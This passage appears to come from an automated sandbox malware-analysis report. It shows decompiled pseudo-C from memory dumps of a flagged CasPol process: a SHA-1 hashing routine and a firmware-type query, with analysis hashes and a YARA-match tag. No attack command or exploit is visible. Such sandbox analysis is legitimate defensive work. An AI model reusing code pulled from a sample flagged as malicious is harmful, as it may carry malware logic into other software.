                                                                					 *((intOrPtr*)(_t118 - 0x64)) = E0166AA90();
                                                                					 *((intOrPtr*)(_t118 - 0x64)) = 0;
                                                                					_t113 = L01644620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
                                                                					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
                                                                					if(_t113 != 0) {
                                                                						_push(_t118 - 0x70);
                                                                						_push( *((intOrPtr*)(_t118 - 0x70)));
                                                                						_push(_t113);
                                                                						_push(4);
                                                                						_push(_t118 - 0x78);
                                                                						_push(0x6b);
                                                                						_t84 = E0166AA90();
                                                                						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
                                                                						if(_t84 < 0) {
                                                                							goto L29;
                                                                						}
                                                                						_t110 = 0;
                                                                						_t106 = 0;
                                                                						while(1) {
                                                                							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
                                                                							 *(_t118 - 0x88) = _t106;
                                                                							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
                                                                								break;
                                                                							}
                                                                							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
                                                                							_t106 = _t106 + 1;
                                                                						}
                                                                						_t88 = E016A500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
                                                                						_t119 = _t119 + 0x1c;
                                                                						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
                                                                						if(_t88 < 0) {
                                                                							goto L29;
                                                                						}
                                                                						_t101 = _t118 - 0x3c;
                                                                						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
                                                                						goto L21;
                                                                					}
                                                                					_t67 = 0xc0000017;
                                                                					goto L28;
                                                                				}
                                                                				_push(0);
                                                                				_push(0x20);
                                                                				_push(_t118 - 0x60);
                                                                				_push(0x5a);
                                                                				_t94 = E01669860();
                                                                				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
                                                                				if(_t94 < 0) {
                                                                					goto L29;
                                                                				}
                                                                				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
                                                                					_t101 = L"Legacy";
                                                                					_push(6);
                                                                				} else {
                                                                					_t101 = L"UEFI";
                                                                					_push(4);
                                                                				}
                                                                				_pop(_t65);
                                                                				goto L21;
                                                                 			}

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID: Legacy$UEFI
                                                                • API String ID: 2994545307-634100481
                                                                • Opcode ID: 39fc742b8cfa7d8ca342d030cd5787d090356ba5db6685da7b16ead7f8a85346
                                                                • Instruction ID: 35405bca14efc40fca0285ba933405ccaf63f407cfbe37c2476a9a178db48fb3
                                                                • Opcode Fuzzy Hash: 39fc742b8cfa7d8ca342d030cd5787d090356ba5db6685da7b16ead7f8a85346
                                                                • Instruction Fuzzy Hash: F0516D71A006099FDB25DFA8CC40AAEBBF9BF88700F54406DE60AEB251E7719D01CF50
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 72%
                                                                			E0040BF7E(signed int* _a4) {
                                                                				signed int _v8;
                                                                				signed int _v12;
                                                                				signed int _v16;
                                                                				char _v304;
                                                                				signed char* _t277;
                                                                				signed int* _t278;
                                                                				signed int _t279;
                                                                				signed int _t285;
                                                                				signed int _t288;
                                                                				signed int _t292;
                                                                				signed int _t295;
                                                                				signed int _t299;
                                                                				signed int _t303;
                                                                				signed int _t305;
                                                                				signed int _t311;
                                                                				signed int _t319;
                                                                				signed int _t321;
                                                                				signed int _t324;
                                                                				signed int _t326;
                                                                				signed int _t335;
                                                                				signed int _t341;
                                                                				signed int _t342;
                                                                				signed int _t347;
                                                                				signed int _t356;
                                                                				signed int _t360;
                                                                				signed int _t361;
                                                                				signed int _t365;
                                                                				signed int _t368;
                                                                				signed int _t372;
                                                                				signed int _t373;
                                                                				signed int _t402;
                                                                				signed int _t407;
                                                                				signed int _t413;
                                                                				signed int _t416;
                                                                				signed int _t423;
                                                                				signed int _t426;
                                                                				signed int _t435;
                                                                				signed int _t437;
                                                                				signed int _t440;
                                                                				signed int _t448;
                                                                				signed int _t463;
                                                                				signed int _t466;
                                                                				signed int _t467;
                                                                				signed int _t468;
                                                                				signed int _t474;
                                                                				signed int _t482;
                                                                				signed int _t483;
                                                                				signed int* _t484;
                                                                				signed int* _t487;
                                                                				signed int _t494;
                                                                				signed int _t497;
                                                                				signed int _t502;
                                                                				signed int _t505;
                                                                				signed int _t508;
                                                                				signed int _t511;
                                                                				signed int _t512;
                                                                				signed int _t516;
                                                                				signed int _t528;
                                                                				signed int _t531;
                                                                				signed int _t538;
                                                                				void* _t544;
                                                                				void* _t546;
                                                                
                                                                				asm("adc [esp-0x3e], ebx");
                                                                				_t544 = _t546;
                                                                				_t487 = _a4;
                                                                				_t356 = 0;
                                                                				_t2 =  &(_t487[7]); // 0x1b
                                                                				_t277 = _t2;
                                                                				do {
                                                                					 *(_t544 + _t356 * 4 - 0x14c) = ((( *(_t277 - 1) & 0x000000ff) << 0x00000008 |  *_t277 & 0x000000ff) << 0x00000008 | _t277[1] & 0x000000ff) << 0x00000008 | _t277[2] & 0x000000ff;
                                                                					 *(_t544 + _t356 * 4 - 0x148) = (((_t277[3] & 0x000000ff) << 0x00000008 | _t277[4] & 0x000000ff) << 0x00000008 | _t277[5] & 0x000000ff) << 0x00000008 | _t277[6] & 0x000000ff;
                                                                					 *(_t544 + _t356 * 4 - 0x144) = (((_t277[7] & 0x000000ff) << 0x00000008 | _t277[8] & 0x000000ff) << 0x00000008 | _t277[9] & 0x000000ff) << 0x00000008 | _t277[0xa] & 0x000000ff;
                                                                					 *(_t544 + _t356 * 4 - 0x140) = (((_t277[0xb] & 0x000000ff) << 0x00000008 | _t277[0xc] & 0x000000ff) << 0x00000008 | _t277[0xd] & 0x000000ff) << 0x00000008 | _t277[0xe] & 0x000000ff;
                                                                					_t356 = _t356 + 4;
                                                                					_t277 =  &(_t277[0x10]);
                                                                				} while (_t356 < 0x10);
                                                                				_t278 =  &_v304;
                                                                				_v8 = 0x10;
                                                                				do {
                                                                					_t402 =  *(_t278 - 0x18);
                                                                					_t463 =  *(_t278 - 0x14);
                                                                					_t360 =  *(_t278 - 0x20) ^ _t278[5] ^  *_t278 ^ _t402;
                                                                					asm("rol ecx, 1");
                                                                					asm("rol ebx, 1");
                                                                					_t278[9] =  *(_t278 - 0x1c) ^ _t278[6] ^ _t278[1] ^ _t463;
                                                                					_t278[8] = _t360;
                                                                					_t319 = _t278[7] ^  *(_t278 - 0x10) ^ _t278[2];
                                                                					_t278 =  &(_t278[4]);
                                                                					asm("rol ebx, 1");
                                                                					asm("rol edx, 1");
                                                                					_t46 =  &_v8;
                                                                					 *_t46 = _v8 - 1;
                                                                					_t278[6] = _t319 ^ _t402;
                                                                					_t278[7] =  *(_t278 - 0x1c) ^  *(_t278 - 4) ^ _t360 ^ _t463;
                                                                				} while ( *_t46 != 0);
                                                                				_t321 =  *_t487;
                                                                				_t279 = _t487[1];
                                                                				_t361 = _t487[2];
                                                                				_t407 = _t487[3];
                                                                				_v12 = _t321;
                                                                				_v16 = _t487[4];
                                                                				_v8 = 0;
                                                                				do {
                                                                					asm("rol ebx, 0x5");
                                                                					_t466 = _v8;
                                                                					_t494 = _t321 + ( !_t279 & _t407 | _t361 & _t279) +  *((intOrPtr*)(_t544 + _t466 * 4 - 0x14c)) + _v16 + 0x5a827999;
                                                                					_t324 = _v12;
                                                                					asm("ror eax, 0x2");
                                                                					_v16 = _t407;
                                                                					_v12 = _t494;
                                                                					asm("rol esi, 0x5");
                                                                					_v8 = _t361;
                                                                					_t413 = _t494 + ( !_t324 & _t361 | _t279 & _t324) +  *((intOrPtr*)(_t544 + _t466 * 4 - 0x148)) + _v16 + 0x5a827999;
                                                                					_t497 = _t279;
                                                                					asm("ror ebx, 0x2");
                                                                					_v16 = _v8;
                                                                					_t365 = _v12;
                                                                					_v8 = _t324;
                                                                					_t326 = _v8;
                                                                					_v12 = _t413;
                                                                					asm("rol edx, 0x5");
                                                                					_t285 = _t413 + ( !_t365 & _t497 | _t324 & _t365) +  *((intOrPtr*)(_t544 + _t466 * 4 - 0x144)) + _v16 + 0x5a827999;
                                                                					_t416 = _v12;
                                                                					_v16 = _t497;
                                                                					asm("ror ecx, 0x2");
                                                                					_v8 = _t365;
                                                                					_v12 = _t285;
                                                                					asm("rol eax, 0x5");
                                                                					_v16 = _t326;
                                                                					_t502 = _t285 + ( !_t416 & _t326 | _t365 & _t416) +  *((intOrPtr*)(_t544 + _t466 * 4 - 0x140)) + _v16 + 0x5a827999;
                                                                					_t361 = _v12;
                                                                					_t288 = _v8;
                                                                					asm("ror edx, 0x2");
                                                                					_v8 = _t416;
                                                                					_v12 = _t502;
                                                                					asm("rol esi, 0x5");
                                                                					_v16 = _t288;
                                                                					_t279 = _v12;
                                                                					_t505 = _t502 + ( !_t361 & _t288 | _t416 & _t361) +  *((intOrPtr*)(_t544 + _t466 * 4 - 0x13c)) + _v16 + 0x5a827999;
                                                                					_t407 = _v8;
                                                                					asm("ror ecx, 0x2");
                                                                					_t467 = _t466 + 5;
                                                                					_t321 = _t505;
                                                                					_v12 = _t321;
                                                                					_v8 = _t467;
                                                                				} while (_t467 < 0x14);
                                                                				_t468 = 0x14;
                                                                				do {
                                                                					asm("rol esi, 0x5");
                                                                					asm("ror eax, 0x2");
                                                                					_v16 = _t407;
                                                                					_t508 = _t505 + (_t407 ^ _t361 ^ _t279) +  *((intOrPtr*)(_t544 + _t468 * 4 - 0x14c)) + _v16 + 0x6ed9eba1;
                                                                					_t335 = _v12;
                                                                					_v12 = _t508;
                                                                					asm("rol esi, 0x5");
                                                                					_t423 = _t508 + (_t361 ^ _t279 ^ _t335) +  *((intOrPtr*)(_t544 + _t468 * 4 - 0x148)) + _v16 + 0x6ed9eba1;
                                                                					asm("ror ebx, 0x2");
                                                                					_t511 = _t279;
                                                                					_v16 = _t361;
                                                                					_t368 = _v12;
                                                                					_v12 = _t423;
                                                                					asm("rol edx, 0x5");
                                                                					asm("ror ecx, 0x2");
                                                                					_t292 = _t423 + (_t279 ^ _t335 ^ _t368) +  *((intOrPtr*)(_t544 + _t468 * 4 - 0x144)) + _v16 + 0x6ed9eba1;
                                                                					_t426 = _v12;
                                                                					_v8 = _t335;
                                                                					_v8 = _t368;
                                                                					_v12 = _t292;
                                                                					asm("rol eax, 0x5");
                                                                					_t468 = _t468 + 5;
                                                                					_t361 = _v12;
                                                                					asm("ror edx, 0x2");
                                                                					_t146 = _t511 + 0x6ed9eba1; // 0x6ed9eb9f
                                                                					_t512 = _t292 + (_t335 ^ _v8 ^ _t426) +  *((intOrPtr*)(_t544 + _t468 * 4 - 0x154)) + _t146;
                                                                					_t295 = _v8;
                                                                					_v8 = _t426;
                                                                					_v12 = _t512;
                                                                					asm("rol esi, 0x5");
                                                                					_t407 = _v8;
                                                                					_t505 = _t512 + (_t295 ^ _v8 ^ _t361) +  *((intOrPtr*)(_t544 + _t468 * 4 - 0x150)) + _t335 + 0x6ed9eba1;
                                                                					_v16 = _t295;
                                                                					_t279 = _v12;
                                                                					asm("ror ecx, 0x2");
                                                                					_v12 = _t505;
                                                                				} while (_t468 < 0x28);
                                                                				_v8 = 0x28;
                                                                				do {
                                                                					asm("rol esi, 0x5");
                                                                					_v16 = _t407;
                                                                					asm("ror eax, 0x2");
                                                                					_t516 = ((_t361 | _t279) & _t407 | _t361 & _t279) +  *((intOrPtr*)(_t544 + _v8 * 4 - 0x14c)) + _t505 + _v16 - 0x70e44324;
                                                                					_t474 = _v12;
                                                                					_v12 = _t516;
                                                                					asm("rol esi, 0x5");
                                                                					_t341 = _v8;
                                                                					asm("ror edi, 0x2");
                                                                					_t435 = ((_t279 | _t474) & _t361 | _t279 & _t474) +  *((intOrPtr*)(_t544 + _t341 * 4 - 0x148)) + _t516 + _v16 - 0x70e44324;
                                                                					_v16 = _t361;
                                                                					_t372 = _v12;
                                                                					_v12 = _t435;
                                                                					asm("rol edx, 0x5");
                                                                					_v8 = _t279;
                                                                					_t437 = ((_t474 | _t372) & _t279 | _t474 & _t372) +  *((intOrPtr*)(_t544 + _t341 * 4 - 0x144)) + _t435 + _v16 - 0x70e44324;
                                                                					asm("ror ecx, 0x2");
                                                                					_v16 = _v8;
                                                                					_t299 = _v12;
                                                                					_v8 = _t474;
                                                                					_v12 = _t437;
                                                                					asm("rol edx, 0x5");
                                                                					asm("ror eax, 0x2");
                                                                					_t528 = ((_t372 | _t299) & _t474 | _t372 & _t299) +  *((intOrPtr*)(_t544 + _t341 * 4 - 0x140)) + _t437 + _v16 - 0x70e44324;
                                                                					_v16 = _v8;
                                                                					_t440 = _t372;
                                                                					_t361 = _v12;
                                                                					_v8 = _t440;
                                                                					_v12 = _t528;
                                                                					asm("rol esi, 0x5");
                                                                					_v16 = _v8;
                                                                					_t505 = ((_t299 | _t361) & _t440 | _t299 & _t361) +  *((intOrPtr*)(_t544 + _t341 * 4 - 0x13c)) + _t528 + _v16 - 0x70e44324;
                                                                					_t407 = _t299;
                                                                					_t279 = _v12;
                                                                					asm("ror ecx, 0x2");
                                                                					_v12 = _t505;
                                                                					_t342 = _t341 + 5;
                                                                					_v8 = _t342;
                                                                				} while (_t342 < 0x3c);
                                                                				_t482 = 0x3c;
                                                                				_v8 = 0x3c;
                                                                				do {
                                                                					asm("rol esi, 0x5");
                                                                					_t483 = _v8;
                                                                					asm("ror eax, 0x2");
                                                                					_t531 = (_t407 ^ _t361 ^ _t279) +  *((intOrPtr*)(_t544 + _t482 * 4 - 0x14c)) + _t505 + _v16 - 0x359d3e2a;
                                                                					_t347 = _v12;
                                                                					_v16 = _t407;
                                                                					_v12 = _t531;
                                                                					asm("rol esi, 0x5");
                                                                					asm("ror ebx, 0x2");
                                                                					_t448 = (_t361 ^ _t279 ^ _t347) +  *((intOrPtr*)(_t544 + _t483 * 4 - 0x148)) + _t531 + _v16 - 0x359d3e2a;
                                                                					_v16 = _t361;
                                                                					_t373 = _v12;
                                                                					_v12 = _t448;
                                                                					asm("rol edx, 0x5");
                                                                					_v16 = _t279;
                                                                					asm("ror ecx, 0x2");
                                                                					_t303 = (_t279 ^ _t347 ^ _t373) +  *((intOrPtr*)(_t544 + _t483 * 4 - 0x144)) + _t448 + _v16 - 0x359d3e2a;
                                                                					_t407 = _v12;
                                                                					_v12 = _t303;
                                                                					asm("rol eax, 0x5");
                                                                					_v16 = _t347;
                                                                					_t538 = (_t347 ^ _t373 ^ _t407) +  *((intOrPtr*)(_t544 + _t483 * 4 - 0x140)) + _t303 + _v16 - 0x359d3e2a;
                                                                					_t305 = _t373;
                                                                					_v8 = _t347;
                                                                					asm("ror edx, 0x2");
                                                                					_v8 = _t373;
                                                                					_t361 = _v12;
                                                                					_v12 = _t538;
                                                                					asm("rol esi, 0x5");
                                                                					_t482 = _t483 + 5;
                                                                					_t505 = (_t305 ^ _t407 ^ _t361) +  *((intOrPtr*)(_t544 + _t483 * 4 - 0x13c)) + _t538 + _v16 - 0x359d3e2a;
                                                                					_v16 = _t305;
                                                                					_t279 = _v12;
                                                                					asm("ror ecx, 0x2");
                                                                					_v8 = _t407;
                                                                					_v12 = _t505;
                                                                					_v8 = _t482;
                                                                				} while (_t482 < 0x50);
                                                                				_t484 = _a4;
                                                                				_t484[2] = _t484[2] + _t361;
                                                                				_t484[3] = _t484[3] + _t407;
                                                                				_t311 = _t484[4] + _v16;
                                                                				 *_t484 =  *_t484 + _t505;
                                                                				_t484[1] = _t484[1] + _t279;
                                                                				_t484[4] = _t311;
                                                                				_t484[0x17] = 0;
                                                                				return _t311;
                                                                			}

                                                                0x0040c257
                                                                0x0040c25a
                                                                0x0040c25d
                                                                0x0040c25d
                                                                0x0040c264
                                                                0x0040c267
                                                                0x0040c26a
                                                                0x0040c272
                                                                0x0040c280
                                                                0x0040c283
                                                                0x0040c28a
                                                                0x0040c28d
                                                                0x0040c290
                                                                0x0040c293
                                                                0x0040c296
                                                                0x0040c29f
                                                                0x0040c2a6
                                                                0x0040c2a6
                                                                0x0040c2ac
                                                                0x0040c2c5
                                                                0x0040c2c8
                                                                0x0040c2cf
                                                                0x0040c2d2
                                                                0x0040c2d5
                                                                0x0040c2e7
                                                                0x0040c2f1
                                                                0x0040c2f4
                                                                0x0040c2fd
                                                                0x0040c300
                                                                0x0040c307
                                                                0x0040c30a
                                                                0x0040c310
                                                                0x0040c323
                                                                0x0040c32a
                                                                0x0040c32d
                                                                0x0040c330
                                                                0x0040c333
                                                                0x0040c33c
                                                                0x0040c33f
                                                                0x0040c352
                                                                0x0040c355
                                                                0x0040c35f
                                                                0x0040c362
                                                                0x0040c364
                                                                0x0040c36d
                                                                0x0040c370
                                                                0x0040c383
                                                                0x0040c389
                                                                0x0040c38c
                                                                0x0040c393
                                                                0x0040c395
                                                                0x0040c398
                                                                0x0040c39b
                                                                0x0040c39e
                                                                0x0040c3a1
                                                                0x0040c3a4
                                                                0x0040c3ad
                                                                0x0040c3b2
                                                                0x0040c3b5
                                                                0x0040c3b5
                                                                0x0040c3c8
                                                                0x0040c3cb
                                                                0x0040c3ce
                                                                0x0040c3d5
                                                                0x0040c3d8
                                                                0x0040c3db
                                                                0x0040c3de
                                                                0x0040c3f1
                                                                0x0040c3f4
                                                                0x0040c3ff
                                                                0x0040c402
                                                                0x0040c40e
                                                                0x0040c411
                                                                0x0040c417
                                                                0x0040c41a
                                                                0x0040c41d
                                                                0x0040c424
                                                                0x0040c434
                                                                0x0040c437
                                                                0x0040c43d
                                                                0x0040c440
                                                                0x0040c447
                                                                0x0040c449
                                                                0x0040c44c
                                                                0x0040c44f
                                                                0x0040c452
                                                                0x0040c455
                                                                0x0040c45c
                                                                0x0040c46b
                                                                0x0040c46e
                                                                0x0040c475
                                                                0x0040c478
                                                                0x0040c47b
                                                                0x0040c47e
                                                                0x0040c481
                                                                0x0040c484
                                                                0x0040c487
                                                                0x0040c490
                                                                0x0040c4a1
                                                                0x0040c4a9
                                                                0x0040c4af
                                                                0x0040c4b2
                                                                0x0040c4b4
                                                                0x0040c4b7
                                                                0x0040c4ba
                                                                0x0040c4c7

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312223010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_400000_CasPol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (
                                                                • API String ID: 0-3887548279
                                                                • Opcode ID: e58ba757d2cea3cf0aa36510cdc91d77d09d7bc5db60155aab268f2ad3b00527
                                                                • Instruction ID: 1c13cc515e38273434cd3dc2378e7bf44f33fd2e07e7fb5df5fb5c578cb68f3f
                                                                • Opcode Fuzzy Hash: e58ba757d2cea3cf0aa36510cdc91d77d09d7bc5db60155aab268f2ad3b00527
                                                                • Instruction Fuzzy Hash: A9021CB6E006199FDB14CF9AC8805DDFBF2FF88314F1AC1AAD849A7355D6746A418F80
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 73%
                                                                			E0040BF83(signed int* _a4) {
                                                                				signed int _v8;
                                                                				signed int _v12;
                                                                				signed int _v16;
                                                                				char _v304;
                                                                				signed char* _t277;
                                                                				signed int* _t278;
                                                                				signed int _t279;
                                                                				signed int _t285;
                                                                				signed int _t288;
                                                                				signed int _t292;
                                                                				signed int _t295;
                                                                				signed int _t299;
                                                                				signed int _t303;
                                                                				signed int _t305;
                                                                				signed int _t311;
                                                                				signed int _t318;
                                                                				signed int _t320;
                                                                				signed int _t323;
                                                                				signed int _t325;
                                                                				signed int _t334;
                                                                				signed int _t340;
                                                                				signed int _t341;
                                                                				signed int _t346;
                                                                				signed int _t353;
                                                                				signed int _t357;
                                                                				signed int _t358;
                                                                				signed int _t362;
                                                                				signed int _t365;
                                                                				signed int _t369;
                                                                				signed int _t370;
                                                                				signed int _t399;
                                                                				signed int _t404;
                                                                				signed int _t410;
                                                                				signed int _t413;
                                                                				signed int _t420;
                                                                				signed int _t423;
                                                                				signed int _t432;
                                                                				signed int _t434;
                                                                				signed int _t437;
                                                                				signed int _t445;
                                                                				signed int _t459;
                                                                				signed int _t462;
                                                                				signed int _t463;
                                                                				signed int _t464;
                                                                				signed int _t470;
                                                                				signed int _t478;
                                                                				signed int _t479;
                                                                				signed int* _t480;
                                                                				signed int* _t481;
                                                                				signed int _t488;
                                                                				signed int _t491;
                                                                				signed int _t496;
                                                                				signed int _t499;
                                                                				signed int _t502;
                                                                				signed int _t505;
                                                                				signed int _t506;
                                                                				signed int _t510;
                                                                				signed int _t522;
                                                                				signed int _t525;
                                                                				signed int _t532;
                                                                				void* _t536;
                                                                
                                                                				_t481 = _a4;
                                                                				_t353 = 0;
                                                                				_t2 =  &(_t481[7]); // 0x1b
                                                                				_t277 = _t2;
                                                                				do {
                                                                					 *(_t536 + _t353 * 4 - 0x14c) = ((( *(_t277 - 1) & 0x000000ff) << 0x00000008 |  *_t277 & 0x000000ff) << 0x00000008 | _t277[1] & 0x000000ff) << 0x00000008 | _t277[2] & 0x000000ff;
                                                                					 *(_t536 + _t353 * 4 - 0x148) = (((_t277[3] & 0x000000ff) << 0x00000008 | _t277[4] & 0x000000ff) << 0x00000008 | _t277[5] & 0x000000ff) << 0x00000008 | _t277[6] & 0x000000ff;
                                                                					 *(_t536 + _t353 * 4 - 0x144) = (((_t277[7] & 0x000000ff) << 0x00000008 | _t277[8] & 0x000000ff) << 0x00000008 | _t277[9] & 0x000000ff) << 0x00000008 | _t277[0xa] & 0x000000ff;
                                                                					 *(_t536 + _t353 * 4 - 0x140) = (((_t277[0xb] & 0x000000ff) << 0x00000008 | _t277[0xc] & 0x000000ff) << 0x00000008 | _t277[0xd] & 0x000000ff) << 0x00000008 | _t277[0xe] & 0x000000ff;
                                                                					_t353 = _t353 + 4;
                                                                					_t277 =  &(_t277[0x10]);
                                                                				} while (_t353 < 0x10);
                                                                				_t278 =  &_v304;
                                                                				_v8 = 0x10;
                                                                				do {
                                                                					_t399 =  *(_t278 - 0x18);
                                                                					_t459 =  *(_t278 - 0x14);
                                                                					_t357 =  *(_t278 - 0x20) ^ _t278[5] ^  *_t278 ^ _t399;
                                                                					asm("rol ecx, 1");
                                                                					asm("rol ebx, 1");
                                                                					_t278[9] =  *(_t278 - 0x1c) ^ _t278[6] ^ _t278[1] ^ _t459;
                                                                					_t278[8] = _t357;
                                                                					_t318 = _t278[7] ^  *(_t278 - 0x10) ^ _t278[2];
                                                                					_t278 =  &(_t278[4]);
                                                                					asm("rol ebx, 1");
                                                                					asm("rol edx, 1");
                                                                					_t46 =  &_v8;
                                                                					 *_t46 = _v8 - 1;
                                                                					_t278[6] = _t318 ^ _t399;
                                                                					_t278[7] =  *(_t278 - 0x1c) ^  *(_t278 - 4) ^ _t357 ^ _t459;
                                                                				} while ( *_t46 != 0);
                                                                				_t320 =  *_t481;
                                                                				_t279 = _t481[1];
                                                                				_t358 = _t481[2];
                                                                				_t404 = _t481[3];
                                                                				_v12 = _t320;
                                                                				_v16 = _t481[4];
                                                                				_v8 = 0;
                                                                				do {
                                                                					asm("rol ebx, 0x5");
                                                                					_t462 = _v8;
                                                                					_t488 = _t320 + ( !_t279 & _t404 | _t358 & _t279) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x14c)) + _v16 + 0x5a827999;
                                                                					_t323 = _v12;
                                                                					asm("ror eax, 0x2");
                                                                					_v16 = _t404;
                                                                					_v12 = _t488;
                                                                					asm("rol esi, 0x5");
                                                                					_v8 = _t358;
                                                                					_t410 = _t488 + ( !_t323 & _t358 | _t279 & _t323) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x148)) + _v16 + 0x5a827999;
                                                                					_t491 = _t279;
                                                                					asm("ror ebx, 0x2");
                                                                					_v16 = _v8;
                                                                					_t362 = _v12;
                                                                					_v8 = _t323;
                                                                					_t325 = _v8;
                                                                					_v12 = _t410;
                                                                					asm("rol edx, 0x5");
                                                                					_t285 = _t410 + ( !_t362 & _t491 | _t323 & _t362) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x144)) + _v16 + 0x5a827999;
                                                                					_t413 = _v12;
                                                                					_v16 = _t491;
                                                                					asm("ror ecx, 0x2");
                                                                					_v8 = _t362;
                                                                					_v12 = _t285;
                                                                					asm("rol eax, 0x5");
                                                                					_v16 = _t325;
                                                                					_t496 = _t285 + ( !_t413 & _t325 | _t362 & _t413) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x140)) + _v16 + 0x5a827999;
                                                                					_t358 = _v12;
                                                                					_t288 = _v8;
                                                                					asm("ror edx, 0x2");
                                                                					_v8 = _t413;
                                                                					_v12 = _t496;
                                                                					asm("rol esi, 0x5");
                                                                					_v16 = _t288;
                                                                					_t279 = _v12;
                                                                					_t499 = _t496 + ( !_t358 & _t288 | _t413 & _t358) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x13c)) + _v16 + 0x5a827999;
                                                                					_t404 = _v8;
                                                                					asm("ror ecx, 0x2");
                                                                					_t463 = _t462 + 5;
                                                                					_t320 = _t499;
                                                                					_v12 = _t320;
                                                                					_v8 = _t463;
                                                                				} while (_t463 < 0x14);
                                                                				_t464 = 0x14;
                                                                				do {
                                                                					asm("rol esi, 0x5");
                                                                					asm("ror eax, 0x2");
                                                                					_v16 = _t404;
                                                                					_t502 = _t499 + (_t404 ^ _t358 ^ _t279) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x14c)) + _v16 + 0x6ed9eba1;
                                                                					_t334 = _v12;
                                                                					_v12 = _t502;
                                                                					asm("rol esi, 0x5");
                                                                					_t420 = _t502 + (_t358 ^ _t279 ^ _t334) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x148)) + _v16 + 0x6ed9eba1;
                                                                					asm("ror ebx, 0x2");
                                                                					_t505 = _t279;
                                                                					_v16 = _t358;
                                                                					_t365 = _v12;
                                                                					_v12 = _t420;
                                                                					asm("rol edx, 0x5");
                                                                					asm("ror ecx, 0x2");
                                                                					_t292 = _t420 + (_t279 ^ _t334 ^ _t365) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x144)) + _v16 + 0x6ed9eba1;
                                                                					_t423 = _v12;
                                                                					_v8 = _t334;
                                                                					_v8 = _t365;
                                                                					_v12 = _t292;
                                                                					asm("rol eax, 0x5");
                                                                					_t464 = _t464 + 5;
                                                                					_t358 = _v12;
                                                                					asm("ror edx, 0x2");
                                                                					_t146 = _t505 + 0x6ed9eba1; // 0x6ed9eb9f
                                                                					_t506 = _t292 + (_t334 ^ _v8 ^ _t423) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x154)) + _t146;
                                                                					_t295 = _v8;
                                                                					_v8 = _t423;
                                                                					_v12 = _t506;
                                                                					asm("rol esi, 0x5");
                                                                					_t404 = _v8;
                                                                					_t499 = _t506 + (_t295 ^ _v8 ^ _t358) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x150)) + _t334 + 0x6ed9eba1;
                                                                					_v16 = _t295;
                                                                					_t279 = _v12;
                                                                					asm("ror ecx, 0x2");
                                                                					_v12 = _t499;
                                                                				} while (_t464 < 0x28);
                                                                				_v8 = 0x28;
                                                                				do {
                                                                					asm("rol esi, 0x5");
                                                                					_v16 = _t404;
                                                                					asm("ror eax, 0x2");
                                                                					_t510 = ((_t358 | _t279) & _t404 | _t358 & _t279) +  *((intOrPtr*)(_t536 + _v8 * 4 - 0x14c)) + _t499 + _v16 - 0x70e44324;
                                                                					_t470 = _v12;
                                                                					_v12 = _t510;
                                                                					asm("rol esi, 0x5");
                                                                					_t340 = _v8;
                                                                					asm("ror edi, 0x2");
                                                                					_t432 = ((_t279 | _t470) & _t358 | _t279 & _t470) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x148)) + _t510 + _v16 - 0x70e44324;
                                                                					_v16 = _t358;
                                                                					_t369 = _v12;
                                                                					_v12 = _t432;
                                                                					asm("rol edx, 0x5");
                                                                					_v8 = _t279;
                                                                					_t434 = ((_t470 | _t369) & _t279 | _t470 & _t369) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x144)) + _t432 + _v16 - 0x70e44324;
                                                                					asm("ror ecx, 0x2");
                                                                					_v16 = _v8;
                                                                					_t299 = _v12;
                                                                					_v8 = _t470;
                                                                					_v12 = _t434;
                                                                					asm("rol edx, 0x5");
                                                                					asm("ror eax, 0x2");
                                                                					_t522 = ((_t369 | _t299) & _t470 | _t369 & _t299) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x140)) + _t434 + _v16 - 0x70e44324;
                                                                					_v16 = _v8;
                                                                					_t437 = _t369;
                                                                					_t358 = _v12;
                                                                					_v8 = _t437;
                                                                					_v12 = _t522;
                                                                					asm("rol esi, 0x5");
                                                                					_v16 = _v8;
                                                                					_t499 = ((_t299 | _t358) & _t437 | _t299 & _t358) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x13c)) + _t522 + _v16 - 0x70e44324;
                                                                					_t404 = _t299;
                                                                					_t279 = _v12;
                                                                					asm("ror ecx, 0x2");
                                                                					_v12 = _t499;
                                                                					_t341 = _t340 + 5;
                                                                					_v8 = _t341;
                                                                				} while (_t341 < 0x3c);
                                                                				_t478 = 0x3c;
                                                                				_v8 = 0x3c;
                                                                				do {
                                                                					asm("rol esi, 0x5");
